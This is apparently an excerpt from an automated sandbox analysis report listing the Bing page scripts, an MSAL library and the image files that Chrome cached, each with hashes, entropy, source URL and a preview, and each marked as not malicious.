                                                                                                      Preview:var LinksColorOnMD;(function(n){function i(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function o(n){if(n.button===0&&!n.ctrlKey&&!n.shiftKey){var f=i(sj_et(n));f&&(Lib.CssClass.add(f,t),r[f.href]=sb_st(function(){u(f)},5e3))}}function u(n){Lib.CssClass.remove(n,t)}function s(n){h(n);var r=i(sj_et(n));r&&Lib.CssClass.remove(r,t)}function h(n){var t=i(sj_et(n)),f;t&&(f=r[t.href],f&&sb_ct(f),e&&u(t))}function f(){for(var n,i=_d.getElementsByTagName("A"),t=0;t<i.length;t++)(n=i[t],n)&&(sj_be(n,"mousedown",o),sj_be(n,"click",s))}var t="b_LinksColorMD",r={},e=sj_cook&&sj_cook.get("SRCHHPGUSR","NEWWND")==="1";n.bind=f;f()})(LinksColorOnMD||(LinksColorOnMD={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (19008)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):316988
                                                                                                      Entropy (8bit):5.239088634343518
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:vLKLj7yjWF276GNg9fpe3HdabIKSB1DkCXW8o0oMlppfbm:zgj7bSB1DkCXW8T5dbm
                                                                                                      MD5:8192D891E754AFD81A399F98BC6B265F
                                                                                                      SHA1:965E6C69F45118FEAB86EEEBBB0FC4964F2B3A98
                                                                                                      SHA-256:E2E4D97C20D4478E8E947480C8F6C71A2C795776D405366BE70DB82E4EA4BA77
                                                                                                      SHA-512:7C2712A1E34DA9062F50E7D93F4E74772044E45C265C682ABCD4E28E4004DCDAF6CE7479A4E8785986A88A32257E4FAC0ECF8CE23AFE47968C4510DF0A2C800B
                                                                                                      Malicious:false
                                                                                                      Preview:/*! @azure/msal-browser v2.28.2 2022-09-06 */."use strict";!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).msal={})}(this,(function(e){./*! *****************************************************************************. Copyright (c) Microsoft Corporation... Permission to use, copy, modify, and/or distribute this software for any. purpose with or without fee is hereby granted... THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH. REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY. AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,. INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM. LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR. OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:59:08], progressive, precision 8, 160x160, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5944
                                                                                                      Entropy (8bit):7.819206752415454
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sUbkQe7dQVaRFmwmIE1KFxQ5JKPxCLNO8XrhNOyYSIyQ3DEmISwnFlE6NlG:s+od96rIE1KRCLHXl4DPzEmISwFlE6Nc
                                                                                                      MD5:F6E70DA298349AD94215F0B4A6875037
                                                                                                      SHA1:96F08A674EDB118B6862663ADA27CCCD56B44481
                                                                                                      SHA-256:68B6356BA9F37FF17EAE98BC094A493075F83D446B1E88F1ED32C2926E72E76C
                                                                                                      SHA-512:AFA16D89B1395F1318F42757F9451553F425539087E2EE40EC9FB14EC1FEB0C80254252951472ACC4AB8D4245E53E75F2C43FE41DAF9EC7DA8526C2F7B669BD4
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:59:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.........................................................................................h......................E..T..r..D........@..H.F&....`5.e.%...."..U@C.r.e...5.-.`4".[.`.1C.$)..pZ.".;. .(..w...x.f..*sU[....Y..<.:...b..=+.........n\.b)sv/4^`-.kN.;.v..X....Z......#_...N.....j..4.\......T..,.....B..&..L....^LcJ.KA.=....!iEY...!N....Z.:.d.i..F..d...sP.w=<..59]O..u.?..3...]i....F...C.X...[M..z..<...k..rL.UYr.jz.@ sTf..D8,5.+..<jWr..oL...<H.k;.A I.k)...'.y.j.uZ.,4......(.\HH.ByC..*1.jt.X...Z.......w......`.v.TZ.M.f.J.}.F.e..Te.-N@S...+.].\..u-9..Xg* .B.[M.$..'.ry....Zf...CV.D...S...65 `mH@#.j[.y."...r ).5.B\.o...B...Ee..Q@....,..)..u#..i.j.jAsT...[J.c_...'.....................
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:43:45], progressive, precision 8, 160x160, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3814
                                                                                                      Entropy (8bit):7.634659202076907
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sQrbnTt8ATpTToooX6l4d309BEEGp0m1amWth0x/aA+9GnPoYXEcX:sS8AyJKl4xV0KamWtOb+SP0cX
                                                                                                      MD5:281570611F89219A970F2589F98A09DB
                                                                                                      SHA1:9E2DCCC8A295BBDA4AD12818EA06FA67634E1A98
                                                                                                      SHA-256:7BDAB4155253E159B748E2BE6CB1C0AF736F18D2A4DBDDF79D93D6219A3DE9DD
                                                                                                      SHA-512:FB9CAEE5B3FF8A3CE8C4D6D066CC0283A8A158E32131754CD9EFB1B4A25303CAA72FAE11C23E836B2A2F0D5005F0E39EB2A38D1D28CB81CAE5C1C818D77B80FB
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:43:45....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................... .. ..... .. .. ..$................H.............. ..$..H .. .....AY .....: ...P$..$.. .tXAI ......@....9..I...Rt....f$.Z....+..,.. .t@1.Q.O=..3.l.#.v..1gZ,...[..A&.y.....j....=-.{.[.....5t.y.q..T..t.UY...Z.,..]....{...bI<.4`..<].m'...D..9.......z5.....0G..U.b.e.qn6k7cwo......1G=......)n..g..1.vZ...jIu..9.c.uo=..>...r..-......2..g.V.Z\.{.^c:..Jj.uY....5-."V...?...(......................!..".. .12#0@ABp...............>.....n..>..z..z..n.' .\.J.-...u#.....c~.@d.......|./..g..v....#..:a_....p=$Z.%.3..SN.G..Hi..*_.W........L.........$.?..p_.w. ..e.h..A..9.-[..n.F.......Q.. .2.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (38740), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):38740
                                                                                                      Entropy (8bit):5.156295325159017
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:7nX5LD6HkkHEdz5N9B2b3HGUvavoDbTXGbyswnyD7FJR11pp+CzKdAsT78lLq/uX:7nXx6HrevV11GHX/ulK/Zfm
                                                                                                      MD5:74FAF1ACCB8F72522C7CA3343281A074
                                                                                                      SHA1:7B1BA33A155848525E34976D60CAD0D89724450A
                                                                                                      SHA-256:E131D0DB51A5089562FC2EBA2BFF098F76FAA70A93376747E16EAD3E7B1D98D4
                                                                                                      SHA-512:03A4DD9584D92D07B0A5CD0F505C54E1DEEFF39C3F8B20A5D5DF743FDC0D46DD9B61C5BFEEAB1AAF1CBFB72530896E0A32C981FE289500C4840F01E46F06F8EC
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/exujOhVYSFJeNJdtYMrQ2JckRQo.js
                                                                                                      Preview:var SlideExperience;(function(n){function k(n,t,i,r,u,f,e,o,s,h,c,l,v,y,p,w,b,k,d,g,nt,tt,it,rt,ut,ft,et,ot,st,ht,ct,lt){var yt,at,vt,pt;if(lt===void 0&&(lt=!1),yt=new AjaxDataLoader.AjaxDataLoader("SlideExp",f,!0),at=new a(n,t,i,r,u,yt,e,o,s,h,c,l,v,y,p,w,b,k,d,g,nt,tt,it,rt,ut,ft,et,ot,st,ht,ct,lt),at.init(),_w.StateUpdater){if(vt=_w.StateUpdater.restore(at.stateKey),vt==null)return;pt=parseInt(vt);at.slideToIndex(pt,null,!0)}}function h(n){for(var t in o)if(t.indexOf(n)===0)return o[t]}function f(){sj_evt.fire("lazyLdImg")}function d(n,t){var i=h(n);i&&!i.enableAutoStackableSlideCrossFading&&(i.disableAutoSliding(),i.disableAutoSlidingAnimation(),i.slideToIndex(t))}function g(n){var t=h(n),i=[];return t&&(i=t.getVisibleSlidesIndices()),i}function nt(n,t){var i=h(n),r=i.getVisiblePercentage(t);return new l(t,r)}var t="slide_fading",s="hideSlideMask",v="b_autoslidingfade",y="firstslideopaque",p="enable_selecting",e="selected",c="narrpole",r=_G.RTL,i=r?"marginRight":"marginLeft",w=r?"p
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (576), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):576
                                                                                                      Entropy (8bit):5.192163014367754
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                                                      MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                                                      SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
                                                                                                      SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                                                      SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                                                      Malicious:false
                                                                                                      Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (34732), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):34732
                                                                                                      Entropy (8bit):5.452487645923916
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:+J0AmB7aPmB7aU1THyBVyD3NSrGyDQS+mZvUhM/4S8SrmB:+aaUaJCDA3DjHZv37n6
                                                                                                      MD5:E4FB9B839186660B1F729B8DF8C994B4
                                                                                                      SHA1:931792CD70CED4AD586F6329C30C294EBEA1548E
                                                                                                      SHA-256:6838611C8AB6539005E11C84CA308158F89A51DB57A62CAF21FAAB48BF576177
                                                                                                      SHA-512:625436BB52CBD7DF7ED03BE05FEA52C5D54B6CC15037D70C268D9598E648A22246DB902B9C6F097BA8B18BD924F6AB17120736285D54DCE13773237F1669853A
                                                                                                      Malicious:false
                                                                                                      Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",w="_RwBf",b="rwmrst",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redDotImage.png",k=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible,hasUsedCcpTrial:n&&n.RewardsSessionData&&n.RewardsSessionData.HasUsedCcpTrial}}re
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 1030 x 92, 8-bit colormap, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):10060
                                                                                                      Entropy (8bit):7.915600687574725
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:6+6gMSZWBwqxLaGtfbqPDpi1T/yGCbyNIvd2NFjR6OPR/ZviFINR/q:xlqBFtz2Dpi1Tqlby61YjR6oRoF6y
                                                                                                      MD5:3722F42B4F456CEB0A1555A413EB2D83
                                                                                                      SHA1:07A8C61DBCBB857B840BB7A74BCC62352530A97C
                                                                                                      SHA-256:EC8D527D0173AC87E5FED6CF300BC9E8AFCFFB55BA137EBCFC2DF83E1633D8F5
                                                                                                      SHA-512:71631D67BF706042EC6A8DF526B21CCFDB777873746F3015552304812C57666AECEBD1B928B4591EDF87D904D9628F3675E75844F661C2C0C1A629BC9221BAC7
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/rp/B6jGHby7hXuEC7enS8xiNSUwqXw.png
                                                                                                      Preview:.PNG........IHDR.......\.......Gi...gPLTE.........wxzvwy.J.vvw.P.wwy.K.~y... `.wwz....Q.......)J.vvzrvv.......J.......wwzuwv...DDD.T.uwx.......K.................I.CCCvwx9..xzz.K...I..V.7.................O........K..Y....#d.".....vwy.T..l.PWQ!..DDDfff.l.0..DDD.........!\.............E...4..K.....4....DDD....Q....vxzDDD.....b:.....fff"....=?..$e.6...6."i..J?...DDD....5....C...B......$g...3....!\.......#d.C...}..x..n..sm.\..W..........wxz.J..........413......DDD.e".......?.4....qqq$d.......9...m."..7...N.9...T..l.5..1t.3{.&Z.2..6..!\.'o.7.....5..)..U.....K..fffG.....Q..C...R.<...Y..K....?...U..D...X.vw.....f...n..6W..m._R.t..K..#....d?.~H...........tRNS.ML... `..`..`]1..@ .. ..0A.@...pA. ..yp.P../ ...B-.......A....`.G....p.r^.C...pj..`!..p.......?.....pcA.......BN....[..:....$.IDATx...o.E......ZNl#..8...e7..EJC.Q0"...B...B$... Z....+V%....JU.SH9T.J..PP.8.O.......gS..o.wgvv.x.}..Q4.:.:...#U..O....cZ.<=x....2.\8t....|..M..,tp*..-.$.J..|.d..H..j...(.\...M-.G.W...
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (622), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):622
                                                                                                      Entropy (8bit):5.265947581512117
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:2QxhNgpOWEaaRHkj6iLUEkFKgsmqRRV6alt0Tk6iLUEkFkno:2QTepraRHk+i1kFKgsmqRRVZr8k6i1kh
                                                                                                      MD5:3104955279E1BBBDB4AE5A0E077C5A74
                                                                                                      SHA1:BA10A722FFF1877C3379DEE7B5F028D467FFD6CF
                                                                                                      SHA-256:A0A1CEE602080757FBADB2D23EAD2BBB8B0726B82FDB2ED654DA4403F1E78EF1
                                                                                                      SHA-512:6937ED6194E4842FF5B4878B0D680E02CAF3185BAF65EDC131260B56A87968B5D6C80F236C1DE1A059D8158BC93B80B831FE679F38FC06DFB7C3413D1D5355AA
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/uhCnIv_xh3wzed7ntfAo1Gf_1s8.js
                                                                                                      Preview:(function(){function n(){var n=_ge("id_p"),t,r,i;n&&(t="",r="",n.dataset?(t=n.dataset.src,r=n.dataset.alt):(t=n.getAttribute("data-src"),r=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=r},n.src=t,i=_d.getElementById("bp_shortcut_img"),i&&(i.setAttribute("src",t),i.onerror=function(){i.setAttribute("src","data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=")})))}n()})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):226
                                                                                                      Entropy (8bit):4.923112772413901
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                                                      MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                                                      SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                                                      SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                                                      SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                                                      Malicious:false
                                                                                                      Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3363
                                                                                                      Entropy (8bit):5.195022922251816
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                                                      MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                                                      SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                                                      SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                                                      SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                                                      Malicious:false
                                                                                                      Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (502), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):502
                                                                                                      Entropy (8bit):5.078627125695514
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:282xHX+NOrStq65B8tq/PLI65iO65ByZ06865/R8d8A:28QHuNO21M+P1CCfVn8d8A
                                                                                                      MD5:33B0493E193496ABB6F24298B1562942
                                                                                                      SHA1:026C85720DD57A98F479BA54925AC7E2AAE213BC
                                                                                                      SHA-256:AFAE8511DA5EF94E3B805A7648B6453185484BB817CE33602FFC57FEDC07EE2B
                                                                                                      SHA-512:343096C5EC178E808AD4BBAC5F4AE4065EC1F0847338A0E6BDCBD5A413AFCA114A1DE88EFA309EE9FDFDD3D46DF7D688CBB2F128FC6C29BB8B316EB0B81D0FAF
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/AmyFcg3Vepj0ebpUklrH4qriE7w.js
                                                                                                      Preview:var SydneyFSCDecouple;(function(n){function i(){var n,i=(n=_w._sydPayWallConfig)===null||n===void 0?void 0:n.loadSydneyConvResWithPayWall;i?sj_evt.bind("waitlistUpdate:eligible",t,!0):t()}function t(){n.setSydFSCEligibleState(!0)}function r(n){typeof SydFSCHelper!="undefined"&&SydFSCHelper.setSydFSCEligibleState?SydFSCHelper.setSydFSCEligibleState(!0):(_w.SydFSCHelper=_w.SydFSCHelper||{},_w.SydFSCHelper.isSydFSCEligible=n)}n.setSydFSCEligibleState=r;i()})(SydneyFSCDecouple||(SydneyFSCDecouple={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65522), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65783
                                                                                                      Entropy (8bit):5.269594649055448
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:Ede0TbABOts87O7vxBdpgnBOkcvM/uDFyB2YJFgFlVn2vVXOaI+QT4atlh93lU3c:np4BJ/Vbf0EArt13O382rVEXHbJh
                                                                                                      MD5:32F90061ECEF93C8AE5EE5B4880C7B20
                                                                                                      SHA1:A4E33B7C1F72891D7209067CE87E67BEE17AD532
                                                                                                      SHA-256:07FC64224B3F4036021A30C1F3DCA5CC6472D2C5BD9733262DDFD40940C4A2B4
                                                                                                      SHA-512:153200B9A9E288D129CB23999138BB9B10DAE8DF41BFCE667184F7C1C486428D21F7D6447528E8B812C246D35576344DC911454C9E74B8B35D8C9BC76BCBA2BA
                                                                                                      Malicious:false
                                                                                                      Preview:define("Types/SuggestionTypes",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});t.SuggestionExpansionType=void 0;var i;(function(n){n[n.NO_EXPANSION=0]="NO_EXPANSION";n[n.REQUERY_EXPANSION=1]="REQUERY_EXPANSION";n[n.ZIS_EXPANSION=2]="ZIS_EXPANSION";n[n.QF_EXPANSION=3]="QF_EXPANSION"})(i=t.SuggestionExpansionType||(t.SuggestionExpansionType={}))});define("Types/CoreTypes",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0})});define("Utilities/SuggestionUtilities",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});t.escapeHTML=t.processSuggestionResponse=t.setPanelValue=t.createSuggestionBlock=t.chatBannerSuggestion=t.isUserSignedIn=t.hasHistorySuggestion=t.onClickHandler=t.updateSearchBoxValueOnHover=t.getNextSelectedSuggestion=t.getHValueFromId=t.convertHighlightedQueryToPlainQuery=t.convertHighlightedQueryToHtml=void 0;const i=/\./g,r=/\./g,
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4286
                                                                                                      Entropy (8bit):1.4428178104858655
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:sfyl+rblmboWbol4bolnbsoItwqol0roooooosEol07ooooooooooolxo/lmyosh:suE9gwXZBQ4Nxbk7/GrQV/z1nfx
                                                                                                      MD5:30967B1B52CB6DF18A8AF8FCC04F83C9
                                                                                                      SHA1:AAF67CD84FCD64FB2D8974D7135D6F1E4FC03588
                                                                                                      SHA-256:439B6089E45EF1E0C37EF88764D5C99A3B2752609C4E2AF3376480D7FFCFAF2E
                                                                                                      SHA-512:7CB3C09A81FBD301741E7CF5296C406BAF1C76685D354C54457C87F6471867390A1AEED9F95701EB9361D7DFACCE31AFD1D240841037FC1DE4A120C66C1B088C
                                                                                                      Malicious:false
                                                                                                      Preview:...... .... .........(... ...@..... .........%...%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n...n...n....................................................................
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1111
                                                                                                      Entropy (8bit):4.61511796141903
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:twgonGLheJUVYxCdBTMqTS05sLGkkhQgbQgwHW4QhJ:6gAShpyxCdBTrS05sLKhvUfSJ
                                                                                                      MD5:C04C8834AC91802186E6CE677AE4A89D
                                                                                                      SHA1:367147873DA32FACB30A1B4885A07920854A6399
                                                                                                      SHA-256:46CC84BA382B065045DB005E895414686F2E76B64AF854F5AD1AC0DF020C3BDB
                                                                                                      SHA-512:82388309085BD143E32981FE4C79604DCEFC4222FB2B53A8625852C3572BDE3D3A578DD558478E6A18F7863CC4EC19DFBA3EE78AD8A4CC71917BFFE027DC22C0
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg
                                                                                                      Preview:<svg width="20px" height="16px" viewBox="0 0 20 16" focusable="false" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <g transform="translate(-10, -12)" fill="#007DAA" >.. <path d="M28.125,14.4615385 L25,14.4615385 L24.26875,13.0203077 C23.95125,12.3950769 23.30125,12 22.59125,12 L17.40875,12 C16.69875,12 16.04875,12.3950769 15.73125,13.0203077 L15,14.4615385 L11.875,14.4615385 C10.84,14.4615385 10,15.2886154 10,16.3076923 L10,26.1538462 C10,27.1729231 10.84,28 11.875,28 L28.125,28 C29.16,28 30,27.1729231 30,26.1538462 L30,16.3076923 C30,15.2886154 29.16,14.4615385 28.125,14.4615385 Z M20,25.5384615 C17.23875,25.5384615 15,23.3341538 15,20.6153846 C15,17.8966154 17.23875,15.6923077 20,15.6923077 C22.76125,15.6923077 25,17.8966154 25,20.6153846 C25,23.3341538 22.76125,25.5384615 20,25.5384615 Z M20,18.1538462 C18.62125,18.1538462 17.5,19.2578462 17.5,20.6153846 C17.5,21.9729231 18.62125,23.0769231 20,23.0769231 C21.37875,23.0769231
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:43:45], progressive, precision 8, 160x160, components 3
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):3814
                                                                                                      Entropy (8bit):7.634659202076907
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sQrbnTt8ATpTToooX6l4d309BEEGp0m1amWth0x/aA+9GnPoYXEcX:sS8AyJKl4xV0KamWtOb+SP0cX
                                                                                                      MD5:281570611F89219A970F2589F98A09DB
                                                                                                      SHA1:9E2DCCC8A295BBDA4AD12818EA06FA67634E1A98
                                                                                                      SHA-256:7BDAB4155253E159B748E2BE6CB1C0AF736F18D2A4DBDDF79D93D6219A3DE9DD
                                                                                                      SHA-512:FB9CAEE5B3FF8A3CE8C4D6D066CC0283A8A158E32131754CD9EFB1B4A25303CAA72FAE11C23E836B2A2F0D5005F0E39EB2A38D1D28CB81CAE5C1C818D77B80FB
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg
